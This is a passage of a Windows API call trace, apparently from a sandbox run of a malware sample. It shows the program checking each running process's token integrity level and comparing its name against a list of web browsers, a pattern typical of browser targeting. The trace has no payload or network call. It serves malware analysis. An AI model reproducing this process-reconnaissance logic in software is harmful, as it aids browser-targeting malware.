dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.880] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.880] GetLastError () returned 0x7a [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.880] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.880] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.880] CloseHandle (hObject=0x340) returned 1 [0228.880] CloseHandle (hObject=0x548) returned 1 [0228.881] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0228.881] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0228.881] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0228.881] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0228.881] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0228.881] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0228.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0228.881] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.881] GetLastError () returned 0x7a [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.881] CloseHandle (hObject=0x340) returned 1 [0228.881] CloseHandle (hObject=0x548) returned 1 [0228.881] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0228.881] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346d50, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.881] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.881] GetLastError () returned 0x7a [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.881] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.881] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.881] CloseHandle (hObject=0x340) returned 1 [0228.881] CloseHandle (hObject=0x548) returned 1 [0228.881] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0228.881] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0228.881] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0228.881] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0228.881] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0228.881] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0228.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0228.881] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.881] GetLastError () returned 0x7a [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.881] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.881] CloseHandle (hObject=0x340) returned 1 [0228.881] CloseHandle (hObject=0x548) returned 1 [0228.882] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0228.882] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346e70, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.882] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.882] GetLastError () returned 0x7a [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.882] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.882] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.882] CloseHandle (hObject=0x340) returned 1 [0228.882] CloseHandle (hObject=0x548) returned 1 [0228.882] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0228.882] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0228.882] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0228.882] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0228.882] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0228.882] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0228.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0228.882] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.882] GetLastError () returned 0x7a [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.882] CloseHandle (hObject=0x340) returned 1 [0228.882] CloseHandle (hObject=0x548) returned 1 [0228.882] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0228.882] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346fa8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.882] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.882] GetLastError () returned 0x7a [0228.882] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.882] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.882] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.882] CloseHandle (hObject=0x340) returned 1 [0228.882] CloseHandle (hObject=0x548) returned 1 [0228.882] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0228.883] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0228.883] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0228.883] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0228.883] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0228.883] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0228.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0228.883] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.883] GetLastError () returned 0x7a [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.883] CloseHandle (hObject=0x340) returned 1 [0228.883] CloseHandle (hObject=0x548) returned 1 [0228.883] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0228.883] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3470b8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.883] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.883] GetLastError () returned 0x7a [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.883] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.883] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.883] CloseHandle (hObject=0x340) returned 1 [0228.883] CloseHandle (hObject=0x548) returned 1 [0228.883] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0228.883] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0228.883] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0228.883] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0228.883] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0228.883] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0228.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0228.883] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.883] GetLastError () returned 0x7a [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.883] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.883] CloseHandle (hObject=0x340) returned 1 [0228.883] CloseHandle (hObject=0x548) returned 1 [0228.884] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0228.884] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3471f0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.884] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.884] GetLastError () returned 0x7a [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.884] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.884] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.884] CloseHandle (hObject=0x340) returned 1 [0228.884] CloseHandle (hObject=0x548) returned 1 [0228.884] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0228.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0228.884] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.884] GetLastError () returned 0x7a [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.884] CloseHandle (hObject=0x340) returned 1 [0228.884] CloseHandle (hObject=0x548) returned 1 [0228.884] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0228.884] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347320, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.884] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.884] GetLastError () returned 0x7a [0228.884] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.884] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.884] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.884] CloseHandle (hObject=0x340) returned 1 [0228.884] CloseHandle (hObject=0x548) returned 1 [0228.884] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0228.885] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0228.885] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0228.885] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0228.885] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0228.885] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0228.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0228.885] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.885] GetLastError () returned 0x7a [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.885] CloseHandle (hObject=0x340) returned 1 [0228.885] CloseHandle (hObject=0x548) returned 1 [0228.885] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0228.885] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347460, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.885] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.885] GetLastError () returned 0x7a [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.885] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.885] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.885] CloseHandle (hObject=0x340) returned 1 [0228.885] CloseHandle (hObject=0x548) returned 1 [0228.885] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0228.885] 